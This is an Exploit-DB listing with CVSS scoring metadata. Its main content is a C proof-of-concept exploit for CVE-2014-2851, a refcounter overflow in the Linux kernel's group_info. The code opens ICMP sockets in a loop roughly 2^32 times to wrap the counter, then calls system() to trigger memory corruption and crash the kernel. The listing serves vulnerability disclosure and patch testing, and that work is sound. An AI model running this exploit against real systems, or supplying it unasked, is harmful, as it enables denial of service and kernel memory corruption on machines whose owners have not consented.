Lucene search

K
exploitdbThomas PolletEDB-ID:32926
HistoryApr 18, 2014 - 12:00 a.m.

Linux Kernel - 'group_info' refcounter Overflow Memory Corruption

2014-04-1800:00:00
Thomas Pollet
www.exploit-db.com
40

CVSS2

6.9

Attack Vector

LOCAL

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

AI Score

8.1

Confidence

High

EPSS

0.001

Percentile

28.6%

/*
 * DoS poc for CVE-2014-2851
 * Linux group_info refcounter overflow memory corruption
 *
 * https://lkml.org/lkml/2014/4/10/736
 *
 * @Tohmaxx - http://thomaspollet.blogspot.be
 *
 * If the app doesn't crash your system, try a different count (argv[1])
 * Execution takes a while because 2^32 socket() calls
 *
 */

#include <arpa/inet.h>
#include <stdio.h>
#include <sys/socket.h>
int main(int argc, char *argv[]) {
    int i ;
    struct sockaddr_in saddr;
    unsigned count = (1UL<<32) - 20 ;
    if(argc >= 2){
        // Specify count
        count = atoi(argv[1]);
    }
    printf("count 0x%x\n",count);
    for(i = 0 ; (unsigned)i < count;i++ ){
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
        if ( i % ( 1 << 22 ) == 0 )
            printf("%i \n",i);
    }
    //Now make it wrap and crash:
    system("/bin/echo bye bye");
}

CVSS2

6.9

Attack Vector

LOCAL

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

AI Score

8.1

Confidence

High

EPSS

0.001

Percentile

28.6%